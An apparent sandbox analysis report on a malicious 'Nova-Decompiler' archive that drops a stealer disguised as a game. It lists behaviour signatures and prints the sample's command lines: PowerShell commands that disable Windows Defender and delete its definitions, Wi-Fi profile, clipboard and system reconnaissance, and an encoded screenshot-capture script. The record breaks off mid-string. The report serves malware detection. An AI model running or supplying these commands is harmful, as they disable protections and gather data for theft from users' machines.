Analysis Overview
SHA256
c4ec24bfa071df98b46f849eb12d65e07878bd897f37b1d1e10c183f1549f243
Threat Level: Likely malicious
The file Nova-Decompiler.zip was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Detects Pyinstaller
Unsigned PE
Gathers system information
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Enumerates processes with tasklist
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Detects videocard installed
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 15:15
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 15:15
Reported
2024-05-10 15:27
Platform
win11-20240426-en
Max time kernel
274s
Max time network
276s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598282923041318" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe1e60ab58,0x7ffe1e60ab68,0x7ffe1e60ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4300 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4984 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7a1c1ae48,0x7ff7a1c1ae58,0x7ff7a1c1ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4488 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3444 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe"
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQ